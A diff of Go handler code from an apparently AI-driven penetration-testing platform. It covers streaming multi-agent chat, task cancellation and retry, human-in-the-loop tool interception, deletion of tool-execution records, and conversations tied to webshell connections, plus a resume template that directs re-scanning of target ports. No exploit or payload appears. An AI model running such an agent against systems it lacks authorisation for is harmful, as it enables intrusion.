||||
return
|
||||
}
|
||||
|
||||
// 更新统计信息(减少相应的计数)
|
||||
for toolName, stats := range toolStats {
|
||||
if err := h.db.DecreaseToolStats(toolName, stats.totalCalls, stats.successCalls, stats.failedCalls); err != nil {
|
||||
h.logger.Warn("更新统计信息失败", zap.Error(err), zap.String("toolName", toolName))
|
||||
// 不返回错误,因为记录已经删除成功
|
||||
}
|
||||
}
|
||||
|
||||
h.logger.Info("批量删除执行记录成功", zap.Int("count", len(request.IDs)))
|
||||
if h.audit != nil {
|
||||
h.audit.RecordOK(c, "tool", "execution_delete_batch", "批量删除工具执行记录", "tool_execution", "", map[string]interface{}{
|
||||
"count": len(request.IDs),
|
||||
})
|
||||
}
|
||||
c.JSON(http.StatusOK, gin.H{"message": "成功删除执行记录", "deleted": len(executions)})
|
||||
return
|
||||
}
|
||||
|
||||
// 如果不使用数据库,尝试从内存中删除(内部MCP服务器)
|
||||
// 注意:内存中的记录可能已经被清理,所以这里只记录日志
|
||||
h.logger.Info("尝试批量删除内存中的执行记录", zap.Int("count", len(request.IDs)))
|
||||
c.JSON(http.StatusOK, gin.H{"message": "执行记录已删除(如果存在)"})
|
||||
}
|
||||
|
||||
// normalizeToolNameFilter 将模型侧 mcp__tool 转为内部存储用的 mcp::tool。
|
||||
func normalizeToolNameFilter(name string) string {
|
||||
name = strings.TrimSpace(name)
|
||||
if name == "" {
|
||||
return name
|
||||
}
|
||||
if strings.Contains(name, "::") {
|
||||
return name
|
||||
}
|
||||
if idx := strings.Index(name, "__"); idx > 0 {
|
||||
return name[:idx] + "::" + name[idx+2:]
|
||||
}
|
||||
return name
|
||||
}
|
||||
|
||||
func toolNameFilterMatches(storedName, filter string) bool {
|
||||
filter = strings.TrimSpace(filter)
|
||||
if filter == "" {
|
||||
return true
|
||||
}
|
||||
storedLower := strings.ToLower(storedName)
|
||||
filterLower := strings.ToLower(filter)
|
||||
if strings.Contains(storedLower, filterLower) {
|
||||
return true
|
||||
}
|
||||
normFilter := strings.ToLower(normalizeToolNameFilter(filter))
|
||||
if normFilter != filterLower && strings.Contains(storedLower, normFilter) {
|
||||
return true
|
||||
}
|
||||
return strings.Contains(strings.ReplaceAll(storedLower, "::", "__"), filterLower)
|
||||
}
|
||||
@@ -0,0 +1,609 @@
|
||||
package handler
|
||||
|
||||
import (
|
||||
"context"
|
||||
"encoding/json"
|
||||
"errors"
|
||||
"fmt"
|
||||
"net/http"
|
||||
"strings"
|
||||
"sync"
|
||||
"time"
|
||||
|
||||
"cyberstrike-ai/internal/config"
|
||||
"cyberstrike-ai/internal/mcp"
|
||||
"cyberstrike-ai/internal/multiagent"
|
||||
|
||||
"github.com/gin-gonic/gin"
|
||||
"go.uber.org/zap"
|
||||
)
|
||||
|
||||
// MultiAgentLoopStream Eino DeepAgent 流式对话(需 config.multi_agent.enabled)。
|
||||
func (h *AgentHandler) MultiAgentLoopStream(c *gin.Context) {
|
||||
c.Header("Content-Type", "text/event-stream; charset=utf-8")
|
||||
c.Header("Cache-Control", "no-cache")
|
||||
c.Header("Connection", "keep-alive")
|
||||
if h.config == nil || !h.config.MultiAgent.Enabled {
|
||||
ev := StreamEvent{Type: "error", Message: "多代理未启用,请在设置或 config.yaml 中开启 multi_agent.enabled"}
|
||||
b, _ := json.Marshal(ev)
|
||||
fmt.Fprintf(c.Writer, "data: %s\n\n", b)
|
||||
done := StreamEvent{Type: "done", Message: ""}
|
||||
db, _ := json.Marshal(done)
|
||||
fmt.Fprintf(c.Writer, "data: %s\n\n", db)
|
||||
if flusher, ok := c.Writer.(http.Flusher); ok {
|
||||
flusher.Flush()
|
||||
}
|
||||
return
|
||||
}
|
||||
|
||||
var req ChatRequest
|
||||
if err := c.ShouldBindJSON(&req); err != nil {
|
||||
event := StreamEvent{Type: "error", Message: "请求参数错误: " + err.Error()}
|
||||
b, _ := json.Marshal(event)
|
||||
fmt.Fprintf(c.Writer, "data: %s\n\n", b)
|
||||
done := StreamEvent{Type: "done", Message: ""}
|
||||
db, _ := json.Marshal(done)
|
||||
fmt.Fprintf(c.Writer, "data: %s\n\n", db)
|
||||
c.Writer.Flush()
|
||||
return
|
||||
}
|
||||
|
||||
c.Header("X-Accel-Buffering", "no")
|
||||
|
||||
// 用于在 sendEvent 中判断是否为用户主动停止导致的取消。
|
||||
// 注意:baseCtx 会在后面创建;该变量用于闭包提前捕获引用。
|
||||
var baseCtx context.Context
|
||||
|
||||
clientDisconnected := false
|
||||
// 与 sseKeepalive 共用:禁止并发写 ResponseWriter,否则会破坏 chunked 编码(ERR_INVALID_CHUNKED_ENCODING)。
|
||||
var sseWriteMu sync.Mutex
|
||||
var ssePublishConversationID string
|
||||
sendEvent := func(eventType, message string, data interface{}) {
|
||||
// 用户主动停止时,Eino 可能仍会并发上报 eventType=="error"。
|
||||
// 为避免 UI 看到“取消错误 + cancelled 文案”两条回复,这里直接丢弃取消对应的 error。
|
||||
if eventType == "error" && baseCtx != nil {
|
||||
cause := context.Cause(baseCtx)
|
||||
if errors.Is(cause, ErrTaskCancelled) || errors.Is(cause, multiagent.ErrInterruptContinue) {
|
||||
return
|
||||
}
|
||||
}
|
||||
ev := StreamEvent{Type: eventType, Message: message, Data: data}
|
||||
b, errMarshal := json.Marshal(ev)
|
||||
if errMarshal != nil {
|
||||
b = []byte(`{"type":"error","message":"marshal failed"}`)
|
||||
}
|
||||
sseLine := make([]byte, 0, len(b)+8)
|
||||
sseLine = append(sseLine, []byte("data: ")...)
|
||||
sseLine = append(sseLine, b...)
|
||||
sseLine = append(sseLine, '\n', '\n')
|
||||
if ssePublishConversationID != "" && h.taskEventBus != nil {
|
||||
h.taskEventBus.Publish(ssePublishConversationID, sseLine)
|
||||
}
|
||||
if clientDisconnected {
|
||||
return
|
||||
}
|
||||
select {
|
||||
case <-c.Request.Context().Done():
|
||||
clientDisconnected = true
|
||||
return
|
||||
default:
|
||||
}
|
||||
sseWriteMu.Lock()
|
||||
_, err := c.Writer.Write(sseLine)
|
||||
if err != nil {
|
||||
sseWriteMu.Unlock()
|
||||
clientDisconnected = true
|
||||
return
|
||||
}
|
||||
if flusher, ok := c.Writer.(http.Flusher); ok {
|
||||
flusher.Flush()
|
||||
} else {
|
||||
c.Writer.Flush()
|
||||
}
|
||||
sseWriteMu.Unlock()
|
||||
}
|
||||
|
||||
h.logger.Info("收到 Eino DeepAgent 流式请求",
|
||||
zap.String("conversationId", req.ConversationID),
|
||||
)
|
||||
|
||||
prep, err := h.prepareMultiAgentSession(&req, c, "multi_agent_stream")
|
||||
if err != nil {
|
||||
sendEvent("error", err.Error(), nil)
|
||||
sendEvent("done", "", nil)
|
||||
return
|
||||
}
|
||||
ssePublishConversationID = prep.ConversationID
|
||||
if prep.CreatedNew {
|
||||
sendEvent("conversation", "会话已创建", map[string]interface{}{
|
||||
"conversationId": prep.ConversationID,
|
||||
})
|
||||
}
|
||||
|
||||
conversationID := prep.ConversationID
|
||||
assistantMessageID := prep.AssistantMessageID
|
||||
h.activateHITLForConversation(conversationID, req.Hitl)
|
||||
if h.hitlManager != nil {
|
||||
defer h.hitlManager.DeactivateConversation(conversationID)
|
||||
}
|
||||
|
||||
if prep.UserMessageID != "" {
|
||||
sendEvent("message_saved", "", map[string]interface{}{
|
||||
"conversationId": conversationID,
|
||||
"userMessageId": prep.UserMessageID,
|
||||
})
|
||||
}
|
||||
|
||||
var cancelWithCause context.CancelCauseFunc
|
||||
curFinalMessage := prep.FinalMessage
|
||||
segmentUserMessage := prep.FinalMessage // 本请求原始用户句,临时重试时不得丢失
|
||||
curHistory := prep.History
|
||||
roleTools := prep.RoleTools
|
||||
orch := strings.TrimSpace(req.Orchestration)
|
||||
|
||||
taskStatus := "completed"
|
||||
// 仅在成功 StartTask 后再 FinishTask;避免「任务已存在」分支 return 时误删正在运行的同会话任务。
|
||||
taskOwned := false
|
||||
defer func() {
|
||||
if taskOwned {
|
||||
h.tasks.FinishTask(conversationID, taskStatus)
|
||||
}
|
||||
}()
|
||||
|
||||
sendEvent("progress", "正在启动 Eino 多代理...", map[string]interface{}{
|
||||
"conversationId": conversationID,
|
||||
})
|
||||
|
||||
stopKeepalive := make(chan struct{})
|
||||
go sseKeepalive(c, stopKeepalive, &sseWriteMu)
|
||||
defer close(stopKeepalive)
|
||||
|
||||
var result *multiagent.RunResult
|
||||
var runErr error
|
||||
|
||||
baseCtx, cancelWithCause = context.WithCancelCause(context.Background())
|
||||
taskCtx, timeoutCancel := context.WithTimeout(baseCtx, 600*time.Minute)
|
||||
|
||||
if _, err := h.tasks.StartTask(conversationID, req.Message, cancelWithCause); err != nil {
|
||||
var errorMsg string
|
||||
if errors.Is(err, ErrTaskAlreadyRunning) {
|
||||
errorMsg = "⚠️ 当前会话已有任务正在执行中,请等待当前任务完成或点击「停止任务」后再尝试。"
|
||||
sendEvent("error", errorMsg, map[string]interface{}{
|
||||
"conversationId": conversationID,
|
||||
"errorType": "task_already_running",
|
||||
})
|
||||
} else {
|
||||
errorMsg = "❌ 无法启动任务: " + err.Error()
|
||||
sendEvent("error", errorMsg, nil)
|
||||
}
|
||||
if assistantMessageID != "" {
|
||||
_, _ = h.db.Exec("UPDATE messages SET content = ?, updated_at = ? WHERE id = ?", errorMsg, time.Now(), assistantMessageID)
|
||||
}
|
||||
sendEvent("done", "", map[string]interface{}{"conversationId": conversationID})
|
||||
timeoutCancel()
|
||||
return
|
||||
}
|
||||
taskOwned = true
|
||||
|
||||
// 同一 HTTP 流内多段 Run(如中断并继续)合并 MCP execution id,供最终 response / 库表与工具芯片展示完整列表
|
||||
var cumulativeMCPExecutionIDs []string
|
||||
var transientRunAttempts int
|
||||
var emptyResponseAttempts int
|
||||
// 同一请求内分段续跑时,主代理 iteration 事件按偏移累计,避免 UI 出现「第3轮 → 第1轮」回跳。
|
||||
var mainIterationOffset int
|
||||
|
||||
for {
|
||||
segmentMainIterationMax := 0
|
||||
rawProgressCallback := h.createProgressCallback(taskCtx, cancelWithCause, conversationID, assistantMessageID, sendEvent)
|
||||
progressCallback := func(eventType, message string, data interface{}) {
|
||||
if eventType == "iteration" {
|
||||
if m, ok := data.(map[string]interface{}); ok {
|
||||
if scope, _ := m["einoScope"].(string); scope == "main" {
|
||||
raw := 0
|
||||
switch v := m["iteration"].(type) {
|
||||
case int:
|
||||
raw = v
|
||||
case int32:
|
||||
raw = int(v)
|
||||
case int64:
|
||||
raw = int(v)
|
||||
case float64:
|
||||
raw = int(v)
|
||||
case float32:
|
||||
raw = int(v)
|
||||
}
|
||||
if raw > 0 {
|
||||
if raw > segmentMainIterationMax {
|
||||
segmentMainIterationMax = raw
|
||||
}
|
||||
m["iteration"] = raw + mainIterationOffset
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
rawProgressCallback(eventType, message, data)
|
||||
}
|
||||
taskCtxLoop := mcp.WithMCPConversationID(taskCtx, conversationID)
|
||||
taskCtxLoop = mcp.WithToolRunRegistry(taskCtxLoop, h.tasks)
|
||||
taskCtxLoop = multiagent.WithHITLToolInterceptor(taskCtxLoop, func(ctx context.Context, toolName, arguments string) (string, error) {
|
||||
return h.interceptHITLForEinoTool(ctx, cancelWithCause, conversationID, assistantMessageID, sendEvent, toolName, arguments)
|
||||
})
|
||||
|
||||
result, runErr = multiagent.RunDeepAgent(
|
||||
taskCtxLoop,
|
||||
h.config,
|
||||
&h.config.MultiAgent,
|
||||
h.agent,
|
||||
h.logger,
|
||||
conversationID,
|
||||
h.conversationProjectID(conversationID),
|
||||
curFinalMessage,
|
||||
curHistory,
|
||||
roleTools,
|
||||
progressCallback,
|
||||
h.agentsMarkdownDir,
|
||||
orch,
|
||||
chatReasoningToClientIntent(req.Reasoning),
|
||||
h.projectBlackboardBlock(conversationID),
|
||||
)
|
||||
|
||||
if result != nil && len(result.MCPExecutionIDs) > 0 {
|
||||
cumulativeMCPExecutionIDs = mergeMCPExecutionIDLists(cumulativeMCPExecutionIDs, result.MCPExecutionIDs)
|
||||
}
|
||||
|
||||
handledEmpty, exhaustedEmpty := h.handleEinoEmptyResponseContinue(
|
||||
baseCtx, conversationID, result, runErr, &emptyResponseAttempts,
|
||||
&curHistory, &curFinalMessage, segmentUserMessage, progressCallback,
|
||||
func(msg string, extra map[string]interface{}) { sendEvent("progress", msg, extra) },
|
||||
)
|
||||
if exhaustedEmpty {
|
||||
runErr = nil
|
||||
transientRunAttempts = 0
|
||||
timeoutCancel()
|
||||
break
|
||||
}
|
||||
if handledEmpty {
|
||||
mainIterationOffset += segmentMainIterationMax
|
||||
transientRunAttempts = 0
|
||||
timeoutCancel()
|
||||
baseCtx, cancelWithCause = context.WithCancelCause(context.Background())
|
||||
h.tasks.BindTaskCancel(conversationID, cancelWithCause)
|
||||
taskCtx, timeoutCancel = context.WithTimeout(baseCtx, 600*time.Minute)
|
||||
h.tasks.UpdateTaskStatus(conversationID, "running")
|
||||
continue
|
||||
}
|
||||
|
||||
if runErr == nil {
|
||||
// 任一段成功完成后,重置临时错误重试窗口(次数/退避从头开始)。
|
||||
transientRunAttempts = 0
|
||||
emptyResponseAttempts = 0
|
||||
timeoutCancel()
|
||||
break
|
||||
}
|
||||
|
||||
handled, fatalErr := h.handleEinoTransientRetryContinue(
|
||||
baseCtx, conversationID, result, runErr, &transientRunAttempts,
|
||||
&curHistory, &curFinalMessage, segmentUserMessage, progressCallback,
|
||||
func(msg string, extra map[string]interface{}) { sendEvent("progress", msg, extra) },
|
||||
)
|
||||
if handled {
|
||||
mainIterationOffset += segmentMainIterationMax
|
||||
timeoutCancel()
|
||||
baseCtx, cancelWithCause = context.WithCancelCause(context.Background())
|
||||
h.tasks.BindTaskCancel(conversationID, cancelWithCause)
|
||||
taskCtx, timeoutCancel = context.WithTimeout(baseCtx, 600*time.Minute)
|
||||
h.tasks.UpdateTaskStatus(conversationID, "running")
|
||||
continue
|
||||
}
|
||||
if fatalErr != nil {
|
||||
runErr = fatalErr
|
||||
}
|
||||
|
||||
cause := context.Cause(baseCtx)
|
||||
if errors.Is(cause, multiagent.ErrInterruptContinue) {
|
||||
if shouldPersistEinoAgentTraceAfterRunError(baseCtx) {
|
||||
h.persistEinoAgentTraceForResume(conversationID, result)
|
||||
}
|
||||
note := h.tasks.TakeInterruptContinueNote(conversationID)
|
||||
icSummary := interruptContinueTimelineSummary(note)
|
||||
progressCallback("user_interrupt_continue", icSummary, map[string]interface{}{
|
||||
"conversationId": conversationID,
|
||||
"rawReason": strings.TrimSpace(note),
|
||||
"emptyReason": strings.TrimSpace(note) == "",
|
||||
"kind": "no_active_mcp_tool",
|
||||
})
|
||||
inject := formatInterruptContinueUserMessage(note)
|
||||
// 不写入 messages 表为 user 气泡:避免主对话流出现大段模板;说明已由 user_interrupt_continue 记入助手 process_details(迭代详情)。
|
||||
if hist, err := h.loadHistoryFromAgentTrace(conversationID); err == nil && len(hist) > 0 {
|
||||
curHistory = hist
|
||||
}
|
||||
curFinalMessage = inject
|
||||
sendEvent("progress", "已合并用户补充与最新轨迹,正在继续推理…", map[string]interface{}{
|
||||
"conversationId": conversationID,
|
||||
"source": "interrupt_continue",
|
||||
})
|
||||
mainIterationOffset += segmentMainIterationMax
|
||||
// 非临时错误分段续跑(用户中断并继续)时,清空 transient 计数,避免跨分段累加。
|
||||
transientRunAttempts = 0
|
||||
timeoutCancel()
|
||||
baseCtx, cancelWithCause = context.WithCancelCause(context.Background())
|
||||
h.tasks.BindTaskCancel(conversationID, cancelWithCause)
|
||||
taskCtx, timeoutCancel = context.WithTimeout(baseCtx, 600*time.Minute)
|
||||
h.tasks.UpdateTaskStatus(conversationID, "running")
|
||||
continue
|
||||
}
|
||||
|
||||
if shouldPersistEinoAgentTraceAfterRunError(baseCtx) {
|
||||
h.persistEinoAgentTraceForResume(conversationID, result)
|
||||
}
|
||||
if errors.Is(cause, ErrTaskCancelled) {
|
||||
taskStatus = "cancelled"
|
||||
h.tasks.UpdateTaskStatus(conversationID, taskStatus)
|
||||
cancelMsg := "任务已被用户取消,后续操作已停止。"
|
||||
if assistantMessageID != "" {
|
||||
if result != nil {
|
||||
if err := h.mergeAssistantMessagePartialOnCancel(assistantMessageID, result.Response); err != nil {
|
||||
h.logger.Warn("合并取消前的部分回复失败", zap.Error(err))
|
||||
}
|
||||
}
|
||||
if err := h.appendAssistantMessageNotice(assistantMessageID, cancelMsg); err != nil {
|
||||
h.logger.Warn("更新取消后的助手消息失败", zap.Error(err))
|
||||
}
|
||||
_ = h.db.AddProcessDetail(assistantMessageID, conversationID, "cancelled", cancelMsg, nil)
|
||||
}
|
||||
sendEvent("cancelled", cancelMsg, map[string]interface{}{
|
||||
"conversationId": conversationID,
|
||||
"messageId": assistantMessageID,
|
||||
})
|
||||
sendEvent("done", "", map[string]interface{}{"conversationId": conversationID})
|
||||
timeoutCancel()
|
||||
return
|
||||
}
|
||||
|
||||
if errors.Is(runErr, context.DeadlineExceeded) || errors.Is(context.Cause(taskCtx), context.DeadlineExceeded) {
|
||||
taskStatus = "timeout"
|
||||
h.tasks.UpdateTaskStatus(conversationID, taskStatus)
|
||||
timeoutMsg := "任务执行超时,已自动终止。"
|
||||
if assistantMessageID != "" {
|
||||
_, _ = h.db.Exec("UPDATE messages SET content = ?, updated_at = ? WHERE id = ?", timeoutMsg, time.Now(), assistantMessageID)
|
||||
_ = h.db.AddProcessDetail(assistantMessageID, conversationID, "timeout", timeoutMsg, nil)
|
||||
}
|
||||
sendEvent("error", timeoutMsg, map[string]interface{}{
|
||||
"conversationId": conversationID,
|
||||
"messageId": assistantMessageID,
|
||||
"errorType": "timeout",
|
||||
})
|
||||
sendEvent("done", "", map[string]interface{}{"conversationId": conversationID})
|
||||
timeoutCancel()
|
||||
return
|
||||
}
|
||||
|
||||
h.logger.Error("Eino DeepAgent 执行失败", zap.Error(runErr))
|
||||
taskStatus = "failed"
|
||||
h.tasks.UpdateTaskStatus(conversationID, taskStatus)
|
||||
errMsg := "执行失败: " + runErr.Error()
|
||||
if assistantMessageID != "" {
|
||||
_, _ = h.db.Exec("UPDATE messages SET content = ?, updated_at = ? WHERE id = ?", errMsg, time.Now(), assistantMessageID)
|
||||
_ = h.db.AddProcessDetail(assistantMessageID, conversationID, "error", errMsg, nil)
|
||||
}
|
||||
sendEvent("error", errMsg, map[string]interface{}{
|
||||
"conversationId": conversationID,
|
||||
"messageId": assistantMessageID,
|
||||
})
|
||||
sendEvent("done", "", map[string]interface{}{"conversationId": conversationID})
|
||||
timeoutCancel()
|
||||
return
|
||||
}
|
||||
|
||||
timeoutCancel()
|
||||
|
||||
if assistantMessageID != "" {
|
||||
_ = h.db.UpdateAssistantMessageFinalize(assistantMessageID, result.Response, cumulativeMCPExecutionIDs, multiagent.AggregatedReasoningFromTraceJSON(result.LastAgentTraceInput))
|
||||
}
|
||||
|
||||
if result.LastAgentTraceInput != "" || result.LastAgentTraceOutput != "" {
|
||||
if err := h.db.SaveAgentTrace(conversationID, result.LastAgentTraceInput, result.LastAgentTraceOutput); err != nil {
|
||||
h.logger.Warn("保存代理轨迹失败", zap.Error(err))
|
||||
}
|
||||
}
|
||||
|
||||
effectiveOrch := config.NormalizeMultiAgentOrchestration(h.config.MultiAgent.Orchestration)
|
||||
if o := strings.TrimSpace(req.Orchestration); o != "" {
|
||||
effectiveOrch = config.NormalizeMultiAgentOrchestration(o)
|
||||
}
|
||||
sendEvent("response", result.Response, map[string]interface{}{
|
||||
"mcpExecutionIds": cumulativeMCPExecutionIDs,
|
||||
"conversationId": conversationID,
|
||||
"messageId": assistantMessageID,
|
||||
"agentMode": "eino_" + effectiveOrch,
|
||||
})
|
||||
sendEvent("done", "", map[string]interface{}{"conversationId": conversationID})
|
||||
}
|
||||
|
||||
// MultiAgentLoop Eino DeepAgent 非流式对话(需 multi_agent.enabled)。
|
||||
func (h *AgentHandler) MultiAgentLoop(c *gin.Context) {
|
||||
if h.config == nil || !h.config.MultiAgent.Enabled {
|
||||
c.JSON(http.StatusNotFound, gin.H{"error": "多代理未启用,请在 config.yaml 中设置 multi_agent.enabled: true"})
|
||||
return
|
||||
}
|
||||
|
||||
var req ChatRequest
|
||||
if err := c.ShouldBindJSON(&req); err != nil {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
h.logger.Info("收到 Eino DeepAgent 非流式请求", zap.String("conversationId", req.ConversationID))
|
||||
|
||||
prep, err := h.prepareMultiAgentSession(&req, c, "multi_agent")
|
||||
if err != nil {
|
||||
status, msg := multiAgentHTTPErrorStatus(err)
|
||||
c.JSON(status, gin.H{"error": msg})
|
||||
return
|
||||
}
|
||||
h.activateHITLForConversation(prep.ConversationID, req.Hitl)
|
||||
if h.hitlManager != nil {
|
||||
defer h.hitlManager.DeactivateConversation(prep.ConversationID)
|
||||
}
|
||||
|
||||
baseCtx, cancelWithCause := context.WithCancelCause(c.Request.Context())
|
||||
defer cancelWithCause(nil)
|
||||
taskCtx, timeoutCancel := context.WithTimeout(baseCtx, 600*time.Minute)
|
||||
defer timeoutCancel()
|
||||
progressCallback := h.createProgressCallback(taskCtx, cancelWithCause, prep.ConversationID, prep.AssistantMessageID, nil)
|
||||
taskCtx = multiagent.WithHITLToolInterceptor(taskCtx, func(ctx context.Context, toolName, arguments string) (string, error) {
|
||||
return h.interceptHITLForEinoTool(ctx, cancelWithCause, prep.ConversationID, prep.AssistantMessageID, nil, toolName, arguments)
|
||||
})
|
||||
|
||||
curHist := prep.History
|
||||
curMsg := prep.FinalMessage
|
||||
var result *multiagent.RunResult
|
||||
var runErr error
|
||||
var transientRunAttempts int
|
||||
var emptyResponseAttempts int
|
||||
for {
|
||||
result, runErr = multiagent.RunDeepAgent(
|
||||
taskCtx,
|
||||
h.config,
|
||||
&h.config.MultiAgent,
|
||||
h.agent,
|
||||
h.logger,
|
||||
prep.ConversationID,
|
||||
h.conversationProjectID(prep.ConversationID),
|
||||
curMsg,
|
||||
curHist,
|
||||
prep.RoleTools,
|
||||
progressCallback,
|
||||
h.agentsMarkdownDir,
|
||||
strings.TrimSpace(req.Orchestration),
|
||||
chatReasoningToClientIntent(req.Reasoning),
|
||||
h.projectBlackboardBlock(prep.ConversationID),
|
||||
)
|
||||
handledEmpty, exhaustedEmpty := h.handleEinoEmptyResponseContinue(
|
||||
baseCtx, prep.ConversationID, result, runErr, &emptyResponseAttempts,
|
||||
&curHist, &curMsg, prep.FinalMessage, progressCallback, nil,
|
||||
)
|
||||
if exhaustedEmpty {
|
||||
runErr = nil
|
||||
break
|
||||
}
|
||||
if handledEmpty {
|
||||
continue
|
||||
}
|
||||
if runErr == nil {
|
||||
break
|
||||
}
|
||||
if handled, fatalErr := h.handleEinoTransientRetryContinue(
|
||||
baseCtx, prep.ConversationID, result, runErr, &transientRunAttempts,
|
||||
&curHist, &curMsg, prep.FinalMessage, progressCallback, nil,
|
||||
); handled {
|
||||
continue
|
||||
} else if fatalErr != nil {
|
||||
runErr = fatalErr
|
||||
}
|
||||
if shouldPersistEinoAgentTraceAfterRunError(baseCtx) {
|
||||
h.persistEinoAgentTraceForResume(prep.ConversationID, result)
|
||||
}
|
||||
h.logger.Error("Eino DeepAgent 执行失败", zap.Error(runErr))
|
||||
errMsg := "执行失败: " + runErr.Error()
|
||||
if prep.AssistantMessageID != "" {
|
||||
_, _ = h.db.Exec("UPDATE messages SET content = ?, updated_at = ? WHERE id = ?", errMsg, time.Now(), prep.AssistantMessageID)
|
||||
}
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": errMsg})
|
||||
return
|
||||
}
|
||||
|
||||
if prep.AssistantMessageID != "" {
|
||||
_ = h.db.UpdateAssistantMessageFinalize(prep.AssistantMessageID, result.Response, result.MCPExecutionIDs, multiagent.AggregatedReasoningFromTraceJSON(result.LastAgentTraceInput))
|
||||
}
|
||||
|
||||
if result.LastAgentTraceInput != "" || result.LastAgentTraceOutput != "" {
|
||||
if err := h.db.SaveAgentTrace(prep.ConversationID, result.LastAgentTraceInput, result.LastAgentTraceOutput); err != nil {
|
||||
h.logger.Warn("保存代理轨迹失败", zap.Error(err))
|
||||
}
|
||||
}
|
||||
|
||||
c.JSON(http.StatusOK, ChatResponse{
|
||||
Response: result.Response,
|
||||
MCPExecutionIDs: result.MCPExecutionIDs,
|
||||
ConversationID: prep.ConversationID,
|
||||
Time: time.Now(),
|
||||
})
|
||||
}
|
||||
|
||||
// persistEinoAgentTraceForResume 在 Eino 运行异常结束时写入代理轨迹(库列 last_react_*),供下一请求 loadHistoryFromAgentTrace 软续跑。
|
||||
func (h *AgentHandler) persistEinoAgentTraceForResume(conversationID string, result *multiagent.RunResult) {
|
||||
if h == nil || result == nil {
|
||||
return
|
||||
}
|
||||
if result.LastAgentTraceInput == "" && result.LastAgentTraceOutput == "" {
|
||||
return
|
||||
}
|
||||
if err := h.db.SaveAgentTrace(conversationID, result.LastAgentTraceInput, result.LastAgentTraceOutput); err != nil {
|
||||
h.logger.Warn("保存 Eino 续跑上下文失败", zap.String("conversationId", conversationID), zap.Error(err))
|
||||
}
|
||||
}
|
||||
|
||||
// mergeMCPExecutionIDLists 去重合并多段 Run 的 MCP execution id(顺序:先 dst 后 more)。
|
||||
func mergeMCPExecutionIDLists(dst []string, more []string) []string {
|
||||
seen := make(map[string]struct{}, len(dst)+len(more))
|
||||
out := make([]string, 0, len(dst)+len(more))
|
||||
add := func(ids []string) {
|
||||
for _, id := range ids {
|
||||
id = strings.TrimSpace(id)
|
||||
if id == "" {
|
||||
continue
|
||||
}
|
||||
if _, ok := seen[id]; ok {
|
||||
continue
|
||||
}
|
||||
seen[id] = struct{}{}
|
||||
out = append(out, id)
|
||||
}
|
||||
}
|
||||
add(dst)
|
||||
add(more)
|
||||
return out
|
||||
}
|
||||
|
||||
// interruptContinueTimelineSummary 时间线 / process_details 中展示的简短正文(完整模板已写入另一条用户消息)。
|
||||
func interruptContinueTimelineSummary(note string) string {
|
||||
note = strings.TrimSpace(note)
|
||||
if note == "" {
|
||||
return "用户选择「中断并继续」,未填写说明;已按默认渗透补充模板合并上下文并续跑。"
|
||||
}
|
||||
return "用户中断说明(原文):\n\n" + note
|
||||
}
|
||||
|
||||
// formatInterruptContinueUserMessage 将「中断并继续」弹窗中的说明格式化为新一轮 user 消息(渗透场景下强调路径补充与端口复扫)。
|
||||
func formatInterruptContinueUserMessage(note string) string {
|
||||
var b strings.Builder
|
||||
b.WriteString("【用户补充 / 中断后继续】\n")
|
||||
if s := strings.TrimSpace(note); s != "" {
|
||||
b.WriteString(s)
|
||||
b.WriteString("\n\n")
|
||||
}
|
||||
b.WriteString("【请在本轮落实】\n")
|
||||
b.WriteString("- 将用户提供的接口路径、参数、业务变化纳入后续测试与推理。\n")
|
||||
b.WriteString("- 若资产或目标信息有更新,请对目标重新执行端口/服务探测,再基于新结果规划下一步。\n")
|
||||
b.WriteString("- 在已有轨迹基础上推进,避免无意义重复已完成的步骤。\n")
|
||||
return strings.TrimSpace(b.String())
|
||||
}
|
||||
|
||||
func multiAgentHTTPErrorStatus(err error) (int, string) {
|
||||
msg := err.Error()
|
||||
switch {
|
||||
case strings.Contains(msg, "对话不存在"):
|
||||
return http.StatusNotFound, msg
|
||||
case strings.Contains(msg, "未找到该 WebShell"):
|
||||
return http.StatusBadRequest, msg
|
||||
case strings.Contains(msg, "附件最多"):
|
||||
return http.StatusBadRequest, msg
|
||||
case strings.Contains(msg, "保存用户消息失败"), strings.Contains(msg, "创建对话失败"):
|
||||
return http.StatusInternalServerError, msg
|
||||
case strings.Contains(msg, "保存上传文件失败"):
|
||||
return http.StatusInternalServerError, msg
|
||||
default:
|
||||
return http.StatusBadRequest, msg
|
||||
}
|
||||
}
|
||||
@@ -0,0 +1,152 @@
|
||||
package handler
|
||||
|
||||
import (
|
||||
"fmt"
|
||||
"strings"
|
||||
|
||||
"cyberstrike-ai/internal/agent"
|
||||
"cyberstrike-ai/internal/audit"
|
||||
"cyberstrike-ai/internal/database"
|
||||
"cyberstrike-ai/internal/mcp/builtin"
|
||||
|
||||
"github.com/gin-gonic/gin"
|
||||
"go.uber.org/zap"
|
||||
)
|
||||
|
||||
// multiAgentPrepared 多代理请求在调用 Eino 前的会话与消息准备结果。
|
||||
type multiAgentPrepared struct {
|
||||
ConversationID string
|
||||
CreatedNew bool
|
||||
History []agent.ChatMessage
|
||||
FinalMessage string
|
||||
RoleTools []string
|
||||
AssistantMessageID string
|
||||
UserMessageID string
|
||||
}
|
||||
|
||||
func (h *AgentHandler) prepareMultiAgentSession(req *ChatRequest, c *gin.Context, source string) (*multiAgentPrepared, error) {
|
||||
if len(req.Attachments) > maxAttachments {
|
||||
return nil, fmt.Errorf("附件最多 %d 个", maxAttachments)
|
||||
}
|
||||
|
||||
conversationID := strings.TrimSpace(req.ConversationID)
|
||||
createdNew := false
|
||||
if conversationID == "" {
|
||||
title := safeTruncateString(req.Message, 50)
|
||||
var conv *database.Conversation
|
||||
var err error
|
||||
meta := audit.ConversationCreateMetaFromGin(c, source)
|
||||
meta.ProjectID = effectiveProjectID(h.config, req.ProjectID)
|
||||
if strings.TrimSpace(req.WebShellConnectionID) != "" {
|
||||
meta.Source = source + "_webshell"
|
||||
meta.WebShellConnectionID = strings.TrimSpace(req.WebShellConnectionID)
|
||||
conv, err = h.db.CreateConversationWithWebshell(meta.WebShellConnectionID, title, meta)
|
||||
} else {
|
||||
conv, err = h.db.CreateConversation(title, meta)
|
||||
}
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("创建对话失败: %w", err)
|
||||
}
|
||||
conversationID = conv.ID
|
||||
createdNew = true
|
||||
} else {
|
||||
if _, err := h.db.GetConversation(conversationID); err != nil {
|
||||
return nil, fmt.Errorf("对话不存在")
|
||||
}
|
